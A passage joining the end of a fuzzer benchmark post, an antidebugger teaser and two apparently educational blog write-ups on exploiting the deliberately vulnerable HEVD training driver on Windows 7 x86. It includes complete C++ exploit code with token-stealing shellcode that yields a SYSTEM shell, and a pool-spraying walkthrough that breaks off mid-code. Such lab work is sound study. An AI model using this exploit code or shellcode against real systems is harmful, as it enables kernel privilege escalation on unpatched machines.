                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

The universal antidebugger, x64 revamped

10 April 2020 at 00:00
A single step for a debugger a giant leap for the obfuscator. When a debugger hits a breakpoint, it can perform single-stepping into the subsequent instructions by halting itself each time. To do so, it uses a specially crafted flag called Trap Flag (TF) residing at 0x8th bit position inside the EFLAGS x86 register. If the Trap Flag is enabled, the processor then triggers an interrupt after each instruction has been executed.

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set 0xFFFFFFFF which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value is now over 8 bytes in length, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: move ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually its a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and then loaded into to eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi which we can see holds 0x800. If the eax is equal to or more than 0x800, we can see that take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this to quotient to edi which was zeroed out previously and has remained up until now unchanged. If length/4 quotient is the same or more than the counter, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer is to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move now to the next 4 bytes. We see also that edi incremented and we now understand what is taking place.

As long as:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 1871
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here, we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re doing a comparison on the 4 byte value at this address to ecx or bad0b0b0. We won’t hit that criteria but on the next iteration, our counter will be == to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF and watch us sail right through length check and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will pass the length check now for sure, which we saw coming, the other really interesting thing that we took note of previously but can see playing out here is that ebx has been left undisturbed and is at 0xffffffff still. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating or not. This value is eventually loaded into eax and divided by 4!. 0xfffffffff divided by 4 will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function. Obviously we BSOD here.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug for this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done like the stack overflow and the integer overflow. We get a user buffer and send it to the routine which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool which are pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool which is allowed to be “paged out” when there is no more RAM capacity to a secondary storage medium.

The APIs that are relevant here in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. This API prototype looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is no vulnerability obviously; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64 which is right after the memcpy operation and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax so we can go to that location with the !pool command which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428 which is 0x8 before. This is because there is a 4 byte ULONG value and our pool tag placed before our actually buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG to being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes which we knew. The numbers that begin 0y are binary. But, you can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together and form this Ulong1 member which begins at offset 0x000. Then, from that offset, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to, was that the !pool command told us our chunk was 0x200 bytes long which makes sense when you add the size of the header 0x8 to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worth while for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next, is take our pretty pool allocations that form a large solid block, and poke holes in it the size of our kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have, is our alloaction completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not an arbitrary system process.

We will use this ability to overwrite data to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up to the kernel executing a function pointer which we will have filled with shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now, is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar amount of objects that FuzzySec and r0otki7 did,

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
